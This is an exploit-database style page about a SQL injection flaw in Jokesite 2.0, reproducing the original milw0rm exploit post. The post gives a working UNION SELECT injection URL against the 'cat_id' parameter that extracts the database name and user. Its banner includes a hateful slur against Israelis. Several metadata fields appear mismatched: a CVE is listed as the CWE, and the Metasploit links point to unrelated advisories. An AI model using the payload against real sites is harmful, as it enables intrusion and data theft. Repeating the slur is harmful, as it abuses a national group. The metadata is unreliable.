Jokesite 2.0 SQL Injection

vendor:

Jokesite

by:

Cyb3r-1sT

9.3

CVSS

HIGH

SQL Injection

CWE

Product Name: Jokesite

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: CVE-2009-4456

CPE: a:scriptdemo:jokesite:2.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Jokesite 2.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is due to the lack of proper input validation in the 'cat_id' parameter of the 'jokes_category.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious 'cat_id' parameter.

Mitigation:

Upgrade to the latest version of Jokesite 2.0.

Source

Exploit-DB raw data:

                         ||          ||   | ||        
                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                 ( :   /    (_)    /           (   . 

                   ================================
                      ==========================
                         ==================== 
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact :  t3tto0 [at] yahoo.com

                 cyb3r-1st [at] hotmail.com

<<!>> Groups : InjEctOr5 T3am 


=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================


<<->> script : jokesite 2.0

<<->> download : www.scriptdemo.com/php-jokesite/ver2.0  


=======================================================
++++++++++++++++ pwning israel fuckers ++++++++++++++++
=======================================================


<<->> D0rk    : find it

<<->> Exploit :>>>>>>>>>
                  www.site.me/jokes_category.php?cat_id=-99999999'+union+select+0,1,2,3,database(),5,6,7,8,9,10,user(),12/*

 
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
                          anaconda-ksa $ Brightdark $ sirus $ crazy-x  and all freinds

<<->> InjEctOr5 TeaM  


<<->> All muslims

# milw0rm.com [2008-05-20]